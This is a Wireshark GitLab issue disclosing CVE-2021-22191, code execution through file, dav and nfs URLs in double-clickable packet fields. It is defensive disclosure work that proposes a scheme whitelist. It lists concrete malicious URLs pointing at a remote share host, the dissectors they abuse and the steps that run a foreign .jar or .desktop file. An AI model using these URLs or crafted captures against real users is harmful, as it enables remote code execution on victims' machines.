CVE-2021-22191: Code execution in Wireshark via non-http(s) schemes in URL fields (#17232) · Issues · Wireshark Foundation / wireshark · GitLab

This issue was reported to [email protected] on 2021-01-19 but has not been acknowledged so far. The Xubuntu NFS variant was discovered after the original report and has been added here.

Description

Some fields in the Wireshark proto_tree are double-clickable and pass URLs with arbitrary schemes to the QDesktopServices::openUrl function. http and https URLs passed to this function are opened by the browser which is generally safe. For some other schemes like dav and file however, referenced files will be opened by the system’s standard application associated with their file type. By preparing internet-hosted file shares and executable files, arbitrary code execution can be achieved via malicious pcap(ng) files or captured live-traffic and some user interaction. Depending on which system and scheme/remote protocols are used, slightly different behaviors can be observed. Attached are two PoC videos:

1 - Windows: PoC_1_Windows

• Packet/disector: DHCP option 114 (Captive Portal)
• Malicious URL: file:////posisec.com/DavWWWRoot/jartest.jar
• File executed: jartest.jar - pops up a swing dialog box
• System: Fresh Windows 10 install with Wireshark 3.4.2 and standard JRE installation
• Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
• Behavior: The user opens the malicious pcap file and double-clicks the file URL. The WebDav share is mounted in the background, and the .jar file is executed.

2.1 - Xubuntu NFS: PoC_2_1_Xubuntu

• Packet/disector: X509 Certificate authority info
• Malicious URL: nfs://posisec.com/export/malicious_cmnd.desktop
• File executed: malicious_cmnd.desktop - pops up an xmessage dialog
• System: Fresh Xubuntu install with Wireshark 3.2.3
• Backend: Anonymous NFS share hosted at nfs://posisec.com/ (src-IP restricted)
• Behavior: The user opens the malicious pcapng file and double-clicks the nfs URL. The NFS share is mounted in the background, and the .desktop file is executed.

2.2 - Xubuntu Webdav: PoC_2_Xubuntu

• Packet/disector: X509 Certificate authority info
• Malicious URL 1: dav://posisec.com/
• Malicious URL 2: file:///run/user/1000/gvfs/dav:host=posisec.com,ssl=false/cmdx.desktop
• File executed: cmdx.desktop - pops up an xmessage dialog
• System: Fresh Xubuntu install with Wireshark 3.2.3
• Backend: Anonymous WebDav share hosted at dav://posisec.com/ (src-IP restricted)
• Behavior: The user first double-clicks malicious URL 1 which mounts the Anonymous WebDav share and opens up the file explorer. When the user double-clicks malicious URL 2, the foreign .desktop file is executed without an OS warning since the now mounted share is referenced via a local file path.

Note that there are more schemes (sftp, davs, smb, …) and payloads (.exe, .bat, …) that can be used to achieve slightly different behaviors. Also note that some ISPs or Access Point devices may block outgoing SMB traffic, preventing exploitation via internet-hosted SMB shares.

Risk

An attacker could distribute malicious capture files and entice people to inspect them. On Windows with JRE installed, a simple doubleclick on a crafted field is enough to cause code execution on the victim’s system.

Mitigation suggestion

Add sanitization logic in ProtoTree::itemDoubleClicked to only allow whitelisted URL schemes (http, https).

Edited Feb 12, 2021 by